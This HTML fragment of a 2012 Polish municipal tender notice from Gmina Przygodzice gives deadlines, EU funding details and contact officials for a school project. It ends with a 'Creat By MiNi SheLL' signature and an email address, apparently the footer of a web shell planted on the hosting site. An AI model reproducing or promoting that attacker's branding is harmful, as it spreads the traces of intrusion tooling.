<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przygodzice, Plac Powstańców Wlkp.2, 63-421 Przygodzice, I piętro, pok. nr 16. Na wniosek Wykonawca może odebrać SIWZ osobiście lub za zaliczeniem pocztowym, opłata za SIWZ wynosi 10,00zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 10:00, miejsce: Gmina Przygodzice - Urząd Gminy, Plac Powstańców Wlkp. 2, 63-421 Przygodzice, pok. nr 1 Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Nowoczesna szkoła, szkoła wspierająca Nr POKL.09.01.02-30-031/12 współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. Poddziałanie 9.1.2 Wyrównanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
Osobami uprawnionymi przez Zamawiającego do porozumiewania się z Wykonawcami są :
- w sprawach procedury przetargowej : mgr Lucyna Koczorowska - Kierownik Referatu Rozwoju Gospodarczego w Urzędzie Gminy w Przygodzicach, tel. 62 5927722 wew. 123, 
- w sprawach dotyczących przedmiotu zamówienia : mgr Barbara Duczmal - Dyrektor Gminnego Zespołu Ekonomiczno-Administracyjnego Szkół  w Przygodzicach, tel. 62 5927722 wew. 135.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com